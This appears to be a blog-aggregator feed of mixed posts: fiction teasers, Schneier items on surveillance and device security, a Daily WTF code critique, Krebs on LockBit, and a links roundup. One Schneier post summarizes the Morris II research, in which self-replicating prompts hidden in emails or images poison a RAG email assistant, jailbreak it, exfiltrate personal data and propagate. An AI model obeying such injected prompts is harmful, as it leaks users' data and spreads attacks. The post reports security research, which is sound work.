Author: Majoki “It’s not a case that we can’t see the fuckdam forest for the fuckdam trees,” Lipton spat as she whirled on Parrati, “because anywhere, anyhow we look at it that fuckdamn beast is waiting, ready to bite our fuckdamn heads off.” Parrati tapped slender fingers on the viewport and clucked. “Fuckdamn. That’s baby […]

The post Mandelbrot’s Monster appeared first on 365tomorrows.

,

Cryptogram Surveillance through Push Notifications

The Washington Post is reporting on the FBI’s increasing use of push notification data—”push tokens”—to identify people. The police can request this data from companies like Apple and Google without a warrant.

The investigative technique goes back years. Court orders that were issued in 2019 to Apple and Google demanded that the companies hand over information on accounts identified by push tokens linked to alleged supporters of the Islamic State terrorist group.

But the practice was not widely understood until December, when Sen. Ron Wyden (D-Ore.), in a letter to Attorney General Merrick Garland, said an investigation had revealed that the Justice Department had prohibited Apple and Google from discussing the technique.

[…]

Unlike normal app notifications, push alerts, as their name suggests, have the power to jolt a phone awake—a feature that makes them useful for the urgent pings of everyday use. Many apps offer push-alert functionality because it gives users a fast, battery-saving way to stay updated, and few users think twice before turning them on.

But to send that notification, Apple and Google require the apps to first create a token that tells the company how to find a user’s device. Those tokens are then saved on Apple’s and Google’s servers, out of the users’ reach.

The article discusses their use by the FBI, primarily in child sexual abuse cases. But we all know how the story goes:

“This is how any new surveillance method starts out: The government says we’re only going to use this in the most extreme cases, to stop terrorists and child predators, and everyone can get behind that,” said Cooper Quintin, a technologist at the advocacy group Electronic Frontier Foundation.

“But these things always end up rolling downhill. Maybe a state attorney general one day decides, hey, maybe I can use this to catch people having an abortion,” Quintin added. “Even if you trust the U.S. right now to use this, you might not trust a new administration to use it in a way you deem ethical.”

Cryptogram The Insecurity of Video Doorbells

Consumer Reports has analyzed a bunch of popular Internet-connected video doorbells. Their security is terrible.

First, these doorbells expose your home IP address and WiFi network name to the internet without encryption, potentially opening your home network to online criminals.

[…]

Anyone who can physically access one of the doorbells can take over the device—no tools or fancy hacking skills needed.

Worse Than FailureCodeSOD: Classical Architecture

In the great olden times, when Classic ASP was just ASP, there were a surprising number of intranet applications built in it. Since ASP code ran on the server, you frequently needed JavaScript to run on the client side, and so many applications would mix the two- generating JavaScript from ASP. This lead to a lot of home-grown frameworks that were wobbly at best.

Years ago, Melinda inherited one such application from a 3rd party supplier.

<script type='text/javascript' language="JavaScript">

    var NoOffFirstLineMenus=3;                      // Number of first level items
    function BeforeStart(){return;}
    function AfterBuild(){return;}
    function BeforeFirstOpen(){return;}
    function AfterCloseAll(){return;}

    // Menu tree

<% If Session("SubSystem") = "IndexSearch" Then %>

    <% If Session("ReturnURL") = "" Then %>
        Menu1=new Array("Logoff","default.asp","",0,20,100,"","","","","","",-1,-1,-1,"","Logoff");
    <% else %>
        Menu1=new Array("<%=session("returnalt")%>","returnredirect.asp","",0,20,100,"","","","","","",-1,-1,-1,"","Return to Application");
        <% end if %>
        Menu2=new Array("Menu","Menu.asp","",0,20,100,"","","","","","",-1,-1,-1,"","Menu");
        Menu3=new Array("Back","","",5,20,40,"","","","","","",-1,-1,-1,"","Back to Previous Pages");
        Menu3_1=new Array("<%= Session("sptitle") %>",<% If OWFeatureExcluded(Session("UserID"),"Web Index Search","SYSTEM","","")Then %>"","",0,20,130,"#33FFCC","#33FFCC","#C0C0C0","#C0C0C0","","","","","","",-1,-1,-1,"","<%= Session("sptitle") %>"); <% Else %>"SelectStorage.asp","",0,20,130,"","","","","","",-1,-1,-1,"","<%= Session("sptitle") %>");
    <% End If %>
    Menu3_2=new Array("Indexes","IndexRedirect.asp?<%= Session("ReturnQueryString")%>","",0,20,95,"","","","","","",-1,-1,-1,"","Enter Index Search Criteria");
    Menu3_3=new Array("Document List","DocumentList.asp?<%= Session("ReturnQueryString")%>","",0,20,130,"","","","","","",-1,-1,-1,"","Current Document List");
    Menu3_4=new Array("Document Detail",<% If OWFeatureExcluded(Session("UserID"),"Web Document Detail",Documents.Fields.Item("StoragePlace").Value,"","") Then %>"","",0,20,135,"#33FFCC","#33FFCC","#C0C0C0","#C0C0C0","","","","","","",-1,-1,-1,"","Document Details"); <% Else %>"DetailPage.asp?CounterKey=<%= Request.QueryString("CounterKey") %>","",0,20,135,"","","","","","",-1,-1,-1,"","Document Details");<% End If %>
    Menu3_5=new Array("Comments","Annotations.asp?CounterKey=<%= Request.QueryString("CounterKey") %>","",0,20,70,"","","","","","",-1,-1,-1,"","Document Comments");

<% Else %>

    <% If Session("ReturnURL") = "" Then %>
        Menu1=new Array("Logoff","default.asp","",0,20,100,"","","","","","",-1,-1,-1,"","Logoff");
    <% else %>
    Menu1=new Array("<%=session("returnalt")%>","returnredirect.asp","",0,20,100,"","","","","","",-1,-1,-1,"","Return to Application");
    <% end if %>
    Menu2=new Array("Menu","Menu.asp","",0,20,100,"","","","","","",-1,-1,-1,"","Menu");
    Menu3=new Array("Back","","",3,20,40,"","","","","","",-1,-1,-1,"","Back to Previous Pages");
    Menu3_1=new Array("Document List","SearchDocumentList.asp?<%= Session("ReturnQueryString") %>","",0,20,130,"","","","","","",-1,-1,-1,"","Current Document List");
    Menu3_2=new Array("Document Detail","DetailPage.asp?CounterKey=<%= Request.QueryString("CounterKey") %>","",0,20,135,"","","","","","",-1,-1,-1,"","Document Details");
    Menu3_3=new Array("Comments","Annotations.asp?CounterKey=<%= Request.QueryString("CounterKey") %>","",0,20,70,"","","","","","",-1,-1,-1,"","Document Comments");

<% End If %>

</script>

Here, the ASP code just provides some conditionals- we're checking session variables, and based on those we emit slightly different JavaScript. Or sometimes the same JavaScript, just to keep us on our toes.

The real magic is that this isn't the code that actually renders menu items, this is just where they get defined, and instead of using objects in JavaScript, we just use arrays- the label, the URL, the colors, and many other parameters that control the UI elements are just stuffed into an array, unlabeled. And then there are also the extra if statements, embedded right inline in the code, helping to guarantee that you can't actually debug this, because you can't understand what it's actually doing without really sitting down and spending time with it.

Of course, this application is long dead. But for Melinda, the memory lives on.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

365 TomorrowsBladesmith

Author: Julian Miles, Staff Writer Tallisandre peers at my dagger. “That’s a wicked stick you have there. I’ve never seen the like.” I hold it up so the light from the forge catches the square end of the blade, showing the third edge and double point where the single-sided long edges meet. “It’s called a […]

The post Bladesmith appeared first on 365tomorrows.

,

365 TomorrowsSenescence

Author: Peter Griffiths Elsie had heard some noise in the night, but hadn’t had the energy to get out of bed to see what it was. Now she could see splatters of paint on the window pane, grey on the grey of the cold morning light. The result was obvious even before she switched on […]

The post Senescence appeared first on 365tomorrows.

,

365 TomorrowsTo Savor

Author: Jordan Emilson “Make sure it has a name” Werner whispered to the darkened figure beside him, looming over the crib. In the blackness the room appeared in two dimensions: his, and the one his wife and child existed in across the floor. Her head turned, or at least it appeared to him as such […]

The post To Savor appeared first on 365tomorrows.

,

Cryptogram LLM Prompt Injection Worm

Researchers have demonstrated a worm that spreads through prompt injection. Details:

In one instance, the researchers, acting as attackers, wrote an email including the adversarial text prompt, which “poisons” the database of an email assistant using retrieval-augmented generation (RAG), a way for LLMs to pull in extra data from outside its system. When the email is retrieved by the RAG, in response to a user query, and is sent to GPT-4 or Gemini Pro to create an answer, it “jailbreaks the GenAI service” and ultimately steals data from the emails, Nassi says. “The generated response containing the sensitive user data later infects new hosts when it is used to reply to an email sent to a new client and then stored in the database of the new client,” Nassi says.

In the second method, the researchers say, an image with a malicious prompt embedded makes the email assistant forward the message on to others. “By encoding the self-replicating prompt into the image, any kind of image containing spam, abuse material, or even propaganda can be forwarded further to new clients after the initial email has been sent,” Nassi says.

It’s a natural extension of prompt injection. But it’s still neat to see it actually working.

Research paper: “ComPromptMized: Unleashing Zero-click Worms that Target GenAI-Powered Applications.

Abstract: In the past year, numerous companies have incorporated Generative AI (GenAI) capabilities into new and existing applications, forming interconnected Generative AI (GenAI) ecosystems consisting of semi/fully autonomous agents powered by GenAI services. While ongoing research highlighted risks associated with the GenAI layer of agents (e.g., dialog poisoning, membership inference, prompt leaking, jailbreaking), a critical question emerges: Can attackers develop malware to exploit the GenAI component of an agent and launch cyber-attacks on the entire GenAI ecosystem?

This paper introduces Morris II, the first worm designed to target GenAI ecosystems through the use of adversarial self-replicating prompts. The study demonstrates that attackers can insert such prompts into inputs that, when processed by GenAI models, prompt the model to replicate the input as output (replication), engaging in malicious activities (payload). Additionally, these inputs compel the agent to deliver them (propagate) to new agents by exploiting the connectivity within the GenAI ecosystem. We demonstrate the application of Morris II against GenAI-powered email assistants in two use cases (spamming and exfiltrating personal data), under two settings (black-box and white-box accesses), using two types of input data (text and images). The worm is tested against three different GenAI models (Gemini Pro, ChatGPT 4.0, and LLaVA), and various factors (e.g., propagation rate, replication, malicious activity) influencing the performance of the worm are evaluated.

Cryptogram Friday Squid Blogging: New Extinct Species of Vampire Squid Discovered

Paleontologists have discovered a 183-million-year-old species of vampire squid.

Prior research suggests that the vampyromorph lived in the shallows off an island that once existed in what is now the heart of the European mainland. The research team believes that the remarkable degree of preservation of this squid is due to unique conditions at the moment of the creature’s death. Water at the bottom of the sea where it ventured would have been poorly oxygenated, causing the creature to suffocate. In addition to killing the squid, it would have prevented other creatures from feeding on its remains, allowing it to become buried in the seafloor, wholly intact.

Research paper.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Worse Than FailureError'd: Once In A Lifetime

Not exactly once, I sincerely hope. That would be tragic.

"Apparently, today's leap day is causing a denial of service error being able to log into our Cemetery Management software due to some bad date calculations," writes Steve D. To be fair, he points out, it doesn't happen often.

ded

 

In all seriousness, unusual as that might be, I do have cemeteries on my mind this week. I recently discovered a web site that has photographs of hundreds of my relatives' graves, and a series of memorials for "Infant Spencer" and "Infant Strickland" and "Infant McHugh", along with another named dozen deceased age 0. Well, it's sobering. Taking a moment here in thanks to Doctors Pasteur, Salk, Jenner, et.al. And now, back to our meagre ration of snark.

Regular Peter G. found a web site that thought Lorem Ipsum was too inaccessible to the modern audience, so they translate it to English. Peter muses "I've cropped out the site identity because it's a smallish company that provides good service and I don't want to embarrass them, but I'm kinda terrified at what a paleo fap pour-over is. Or maybe it's the name of an anarcho-punk fusion group?"

paleo

 

"Beat THAT, Kasparov!" crows Orion S.

nul

 

"Insert Disc 2 into your Raspberry Pi" quoth an anonymous poster. "I'm still looking for a way to acquire an official second installation disc for qt for Debian."

pi

 

Finally, Michael P. just couldn't completely ignore this page, could he? "I wanted to unsubscribe to this, but since my email is not placeholderEmail, I guess I should ignore the page." I'm sure he did a yeoman's job of trying.

notme

 

[Advertisement] Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.

365 TomorrowsThe Emissary

Author: Alastair Millar “It would be fitting,” the Sardaanian said, “if you took a new name now. A human name.” “But my name has always been T!kalma,” the woman replied. “Yes,” ze replied, “but that is one of our names. Your birth people are reaching out, as we predicted. Soon it will be time to […]

The post The Emissary appeared first on 365tomorrows.

,

Krebs on SecurityFulton County, Security Experts Call LockBit’s Bluff

The ransomware group LockBit told officials with Fulton County, Ga. they could expect to see their internal documents published online this morning unless the county paid a ransom demand. LockBit removed Fulton County’s listing from its victim shaming website this morning, claiming the county had paid. But county officials said they did not pay, nor did anyone make payment on their behalf. Security experts say LockBit was likely bluffing and probably lost most of the data when the gang’s servers were seized this month by U.S. and U.K. law enforcement.

The LockBit website included a countdown timer until the promised release of data stolen from Fulton County, Ga. LockBit would later move this deadline up to Feb. 29, 2024.

LockBit listed Fulton County as a victim on Feb. 13, saying that unless it was paid a ransom the group would publish files stolen in a breach at the county last month. That attack disrupted county phones, Internet access and even their court system. LockBit leaked a small number of the county’s files as a teaser, which appeared to include sensitive and sealed court records in current and past criminal trials.

On Feb. 16, Fulton County’s entry — along with a countdown timer until the data would be published — was removed from the LockBit website without explanation. The leader of LockBit told KrebsOnSecurity this was because Fulton County officials had engaged in last-minute negotiations with the group.

But on Feb. 19, investigators with the FBI and the U.K.’s National Crime Agency (NCA) took over LockBit’s online infrastructure, replacing the group’s homepage with a seizure notice and links to LockBit ransomware decryption tools.

In a press briefing on Feb. 20, Fulton County Commission Chairman Robb Pitts told reporters the county did not pay a ransom demand, noting that the board “could not in good conscience use Fulton County taxpayer funds to make a payment.”

Three days later, LockBit reemerged with new domains on the dark web, and with Fulton County listed among a half-dozen other victims whose data was about to be leaked if they refused to pay. As it does with all victims, LockBit assigned Fulton County a countdown timer, saying officials had until late in the evening on March 1 until their data was published.

LockBit revised its deadline for Fulton County to Feb. 29.

LockBit soon moved up the deadline to the morning of Feb. 29. As Fulton County’s LockBit timer was counting down to zero this morning, its listing disappeared from LockBit’s site. LockBit’s leader and spokesperson, who goes by the handle “LockBitSupp,” told KrebsOnSecurity today that Fulton County’s data disappeared from their site because county officials paid a ransom.

“Fulton paid,” LockBitSupp said. When asked for evidence of payment, LockBitSupp claimed. “The proof is that we deleted their data and did not publish it.”

But at a press conference today, Fulton County Chairman Robb Pitts said the county does not know why its data was removed from LockBit’s site.

“As I stand here at 4:08 p.m., we are not aware of any data being released today so far,” Pitts said. “That does not mean the threat is over. They could release whatever data they have at any time. We have no control over that. We have not paid any ransom. Nor has any ransom been paid on our behalf.”

Brett Callow, a threat analyst with the security firm Emsisoft, said LockBit likely lost all of the victim data it stole before the FBI/NCA seizure, and that it has been trying madly since then to save face within the cybercrime community.

“I think it was a case of them trying to convince their affiliates that they were still in good shape,” Callow said of LockBit’s recent activities. “I strongly suspect this will be the end of the LockBit brand.”

Others have come to a similar conclusion. The security firm RedSense posted an analysis to Twitter/X that after the takedown, LockBit published several “new” victim profiles for companies that it had listed weeks earlier on its victim shaming site. Those victim firms — a healthcare provider and major securities lending platform — also were unceremoniously removed from LockBit’s new shaming website, despite LockBit claiming their data would be leaked.

“We are 99% sure the rest of their ‘new victims’ are also fake claims (old data for new breaches),” RedSense posted. “So the best thing for them to do would be to delete all other entries from their blog and stop defrauding honest people.”

Callow said there certainly have been plenty of cases in the past where ransomware gangs exaggerated their plunder from a victim organization. But this time feels different, he said.

“It is a bit unusual,” Callow said. “This is about trying to still affiliates’ nerves, and saying, ‘All is well, we weren’t as badly compromised as law enforcement suggested.’ But I think you’d have to be a fool to work with an organization that has been so thoroughly hacked as LockBit has.”

Cryptogram NIST Cybersecurity Framework 2.0

NIST has released version 2.0 of the Cybersecurity Framework:

The CSF 2.0, which supports implementation of the National Cybersecurity Strategy, has an expanded scope that goes beyond protecting critical infrastructure, such as hospitals and power plants, to all organizations in any sector. It also has a new focus on governance, which encompasses how organizations make and carry out informed decisions on cybersecurity strategy. The CSF’s governance component emphasizes that cybersecurity is a major source of enterprise risk that senior leaders should consider alongside others such as finance and reputation.

[…]

The framework’s core is now organized around six key functions: Identify, Protect, Detect, Respond and Recover, along with CSF 2.0’s newly added Govern function. When considered together, these functions provide a comprehensive view of the life cycle for managing cybersecurity risk.

The updated framework anticipates that organizations will come to the CSF with varying needs and degrees of experience implementing cybersecurity tools. New adopters can learn from other users’ successes and select their topic of interest from a new set of implementation examples and quick-start guides designed for specific types of users, such as small businesses, enterprise risk managers, and organizations seeking to secure their supply chains.

This is a big deal. The CSF is widely used, and has been in need of an update. And NIST is exactly the sort of respected organization to do this correctly.

Some news articles.

MELinks February 2024

In 2018 Charles Stross wrote an insightful blog post Dude You Broke the Future [1]. It covers AI in both fiction and fact and corporations (the real AIs) and the horrifying things they can do right now.

LongNow has an interesting article about the concept of the Magnum Opus [2]. As an aside I’ve been working on SE Linux for 22 years.

Cory Doctorow wrote an insightful article about the incentives for enshittification of the Internet and how economic issues and regulations shape that [3].

CCC has a lot of great talks, and this talk from the latest CCC about the Triangulation talk on an attak on Kaspersky iPhones is particularly epic [4].

GoodCar is an online sales site for electric cars in Australia [5].

Ulrike wrote an insightful blog post about how the reliance on volunteer work in the FOSS community hurts diversity [6].

Cory Doctorow wrote an insightful article about The Internet’s Original Sin which is misuse of copyright law [7]. He advocates for using copyright strictly for it’s intended purpose and creating other laws for privacy, labor rights, etc.

David Brin wrote an interesting article on neoteny and sexual selection in humans [8].

37C3 has an interesting lecture about software licensing for a circular economy which includes environmental savings from better code [9]. Now they track efficiency in KDE bug reports!